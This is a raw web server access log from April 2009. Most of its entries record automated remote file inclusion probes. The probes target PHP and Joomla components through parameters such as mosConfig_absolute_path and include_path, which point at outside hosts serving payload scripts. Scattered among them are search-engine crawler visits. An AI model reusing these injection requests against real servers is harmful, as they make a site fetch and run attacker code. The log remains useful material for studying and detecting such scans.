202.165.244.10 - - [14/Apr/2009:19:05:22 -0500] "GET /logs/errors.php?error=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.165.244.10 - - [14/Apr/2009:19:05:22 -0500] "GET /logs/errors.php?error=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.165.244.10 - - [14/Apr/2009:19:05:22 -0500] "GET /errors.php?error=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.165.244.10 - - [14/Apr/2009:19:05:22 -0500] "GET /errors.php?error=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
59.148.232.5 - - [14/Apr/2009:19:06:19 -0500] "GET /logs/access_log.1234569600//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.148.232.5 - - [14/Apr/2009:19:06:19 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.148.232.5 - - [14/Apr/2009:19:06:20 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.148.232.5 - - [14/Apr/2009:19:06:20 -0500] "GET /logs/access_log.1236211200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:06:33 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:06:33 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:06:33 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:08:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:08:29 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:08:33 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.208.144 - - [14/Apr/2009:19:10:46 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.144 - - [14/Apr/2009:19:10:46 -0500] "GET /logs/access_log.1131408000 HTTP/1.1" 200 1785 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
195.93.200.219 - - [14/Apr/2009:19:14:46 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ambient-arts.co.uk/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.93.200.219 - - [14/Apr/2009:19:14:46 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.ambient-arts.co.uk/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
66.249.71.203 - - [14/Apr/2009:19:19:10 -0500] "GET /Kramden%20Norton.jpg HTTP/1.1" 200 87461 "-""Googlebot-Image/1.0"
67.205.102.239 - - [14/Apr/2009:19:36:30 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.813"
67.205.102.239 - - [14/Apr/2009:19:36:30 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.813"
67.205.102.239 - - [14/Apr/2009:19:36:30 -0500] "GET //guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.813"
67.205.102.239 - - [14/Apr/2009:19:36:30 -0500] "GET //guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.813"
219.83.123.217 - - [14/Apr/2009:19:36:52 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
219.83.123.217 - - [14/Apr/2009:19:36:52 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.83.123.217 - - [14/Apr/2009:19:36:52 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
219.83.123.217 - - [14/Apr/2009:19:37:00 -0500] "GET /logs/access_log.1234915200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.83.123.217 - - [14/Apr/2009:19:37:17 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
219.83.123.217 - - [14/Apr/2009:19:37:17 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
219.83.123.217 - - [14/Apr/2009:19:37:17 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.83.123.217 - - [14/Apr/2009:19:38:42 -0500] "GET /logs/access_log.1234915200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.31.50 - - [14/Apr/2009:19:39:19 -0500] "GET /logs/main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
70.38.31.50 - - [14/Apr/2009:19:39:19 -0500] "GET /main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
70.38.31.50 - - [14/Apr/2009:19:39:37 -0500] "GET /logs/main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
70.38.31.50 - - [14/Apr/2009:19:39:37 -0500] "GET /main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
81.196.124.252 - - [14/Apr/2009:19:39:40 -0500] "GET /logs/main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
81.196.124.252 - - [14/Apr/2009:19:39:41 -0500] "GET /main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
81.196.124.252 - - [14/Apr/2009:19:40:15 -0500] "GET /logs/main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
81.196.124.252 - - [14/Apr/2009:19:40:16 -0500] "GET /main.php?pagina=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
202.165.244.10 - - [14/Apr/2009:19:42:56 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
202.165.244.10 - - [14/Apr/2009:19:42:56 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
202.165.244.10 - - [14/Apr/2009:19:42:56 -0500] "GET //guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
202.165.244.10 - - [14/Apr/2009:19:42:56 -0500] "GET //guestbook1//admin.php?include_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
59.148.232.5 - - [14/Apr/2009:19:43:20 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.148.232.5 - - [14/Apr/2009:19:43:20 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.148.232.5 - - [14/Apr/2009:19:43:22 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.98.1.156 - - [14/Apr/2009:19:49:14 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.98.1.156 - - [14/Apr/2009:19:49:14 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.98.1.156 - - [14/Apr/2009:19:49:15 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.98.1.156 - - [14/Apr/2009:19:49:25 -0500] "GET /logs/access_log.1234915200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.111.176.66 - - [14/Apr/2009:19:51:47 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt? HTTP/1.1" 200 185627 "-""libwww-perl/5.805"
89.111.176.66 - - [14/Apr/2009:19:51:48 -0500] "GET /?DOCUMENT_ROOT=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
84.54.137.9 - - [14/Apr/2009:19:55:41 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:55:41 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.54.137.9 - - [14/Apr/2009:19:55:41 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.171.66.245 - - [14/Apr/2009:20:02:12 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
217.171.66.245 - - [14/Apr/2009:20:02:12 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
59.148.232.5 - - [14/Apr/2009:20:02:13 -0500] "GET /logs/access_log.1234915200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.230.165 - - [14/Apr/2009:20:12:53 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [14/Apr/2009:20:12:53 -0500] "GET /logs/?N=D HTTP/1.1" 200 185627 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [14/Apr/2009:20:14:32 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [14/Apr/2009:20:14:32 -0500] "GET /logs/access_log.1167782400 HTTP/1.1" 200 1323 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
113.29.225.11 - - [14/Apr/2009:20:18:08 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
113.29.225.11 - - [14/Apr/2009:20:18:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
113.29.225.11 - - [14/Apr/2009:20:18:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.249.71.203 - - [14/Apr/2009:20:29:09 -0500] "GET /target_borg.jpg HTTP/1.1" 200 78159 "-""Googlebot-Image/1.0"
98.129.21.154 - - [14/Apr/2009:20:50:18 -0500] "GET //config/dbutil.bck.php?confdir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
98.129.21.154 - - [14/Apr/2009:20:50:18 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
98.129.21.154 - - [14/Apr/2009:20:50:18 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
98.129.21.154 - - [14/Apr/2009:20:50:29 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.199.125.64 - - [14/Apr/2009:20:53:09 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dloisvision.com//dotproject/functions/test.txt??? HTTP/1.1" 404 319 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.199.125.64 - - [14/Apr/2009:20:53:09 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dloisvision.com//dotproject/functions/test.txt??? HTTP/1.1" 404 324 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.188.112.132 - - [14/Apr/2009:21:03:23 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:03:23 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:03:23 -0500] "GET /logs/access_log.1235433600/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
88.84.128.40 - - [14/Apr/2009:21:03:26 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
88.84.128.40 - - [14/Apr/2009:21:03:26 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
77.221.130.18 - - [14/Apr/2009:21:05:05 -0500] "GET /logs/access_log.1236470400/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
77.221.130.18 - - [14/Apr/2009:21:05:05 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
77.221.130.18 - - [14/Apr/2009:21:05:05 -0500] "GET /logs/access_log.1235433600/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
77.221.130.18 - - [14/Apr/2009:21:05:05 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.221.130.18 - - [14/Apr/2009:21:05:07 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.221.130.18 - - [14/Apr/2009:21:05:07 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
77.221.130.18 - - [14/Apr/2009:21:05:07 -0500] "GET /logs/access_log.1235433600/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
77.221.130.18 - - [14/Apr/2009:21:05:07 -0500] "GET /logs/access_log.1236470400/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
203.22.204.193 - - [14/Apr/2009:21:06:37 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
203.22.204.193 - - [14/Apr/2009:21:06:37 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
89.188.112.132 - - [14/Apr/2009:21:06:42 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:06:42 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:06:42 -0500] "GET /logs/access_log.1235433600/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:06:43 -0500] "GET /logs/access_log.1236470400/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
203.22.204.193 - - [14/Apr/2009:21:06:43 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
203.22.204.193 - - [14/Apr/2009:21:06:43 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
81.176.226.164 - - [14/Apr/2009:21:06:49 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
81.176.226.164 - - [14/Apr/2009:21:06:50 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.188.112.132 - - [14/Apr/2009:21:08:17 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:08:17 -0500] "GET /logs/access_log.1235433600/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:08:17 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
89.188.112.132 - - [14/Apr/2009:21:08:17 -0500] "GET /logs/access_log.1236470400/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
89.108.73.84 - - [14/Apr/2009:21:11:13 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.108.73.84 - - [14/Apr/2009:21:11:13 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.108.73.84 - - [14/Apr/2009:21:11:13 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.108.73.84 - - [14/Apr/2009:21:11:13 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
194.165.130.118 - - [14/Apr/2009:21:15:18 -0500] "GET /logs/access_log.1228262400 HTTP/1.1" 200 12042 "http://search.aimhome.netscape.com/aim/boomframe.jsp?query=abc""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; UB1.4_IE6.0_SP1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
59.148.232.5 - - [14/Apr/2009:21:15:22 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
59.148.232.5 - - [14/Apr/2009:21:15:22 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
59.148.232.5 - - [14/Apr/2009:21:15:23 -0500] "GET /logs/access_log.1236211200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.108.73.84 - - [14/Apr/2009:21:24:28 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.108.73.84 - - [14/Apr/2009:21:24:28 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.108.73.84 - - [14/Apr/2009:21:24:29 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
89.108.73.84 - - [14/Apr/2009:21:24:29 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.73.168.129 - - [14/Apr/2009:21:29:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://aldeanos.com/WEB-INF/lib/.../www??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
69.73.168.129 - - [14/Apr/2009:21:29:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://aldeanos.com/WEB-INF/lib/.../www??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
203.22.204.193 - - [14/Apr/2009:21:32:08 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
203.22.204.193 - - [14/Apr/2009:21:32:08 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
203.22.204.193 - - [14/Apr/2009:21:32:09 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
203.22.204.193 - - [14/Apr/2009:21:32:09 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
77.221.130.12 - - [14/Apr/2009:21:49:03 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.12 - - [14/Apr/2009:21:49:03 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
66.90.118.42 - - [14/Apr/2009:21:49:18 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
66.90.118.42 - - [14/Apr/2009:21:49:18 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.90.118.42 - - [14/Apr/2009:21:49:25 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
66.90.118.42 - - [14/Apr/2009:21:49:25 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
119.63.193.56 - - [14/Apr/2009:21:54:17 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
64.69.41.217 - - [14/Apr/2009:21:56:00 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.arcadeshopper.com/joomla/images/stories/sistem.gif??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
64.69.41.217 - - [14/Apr/2009:21:56:00 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.arcadeshopper.com/joomla/images/stories/sistem.gif??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.249.71.203 - - [14/Apr/2009:21:56:50 -0500] "GET /icons/text.gif HTTP/1.1" 200 229 "-""Googlebot-Image/1.0"
81.12.13.152 - - [14/Apr/2009:21:56:58 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
81.12.13.152 - - [14/Apr/2009:21:56:58 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.12.13.152 - - [14/Apr/2009:21:56:58 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
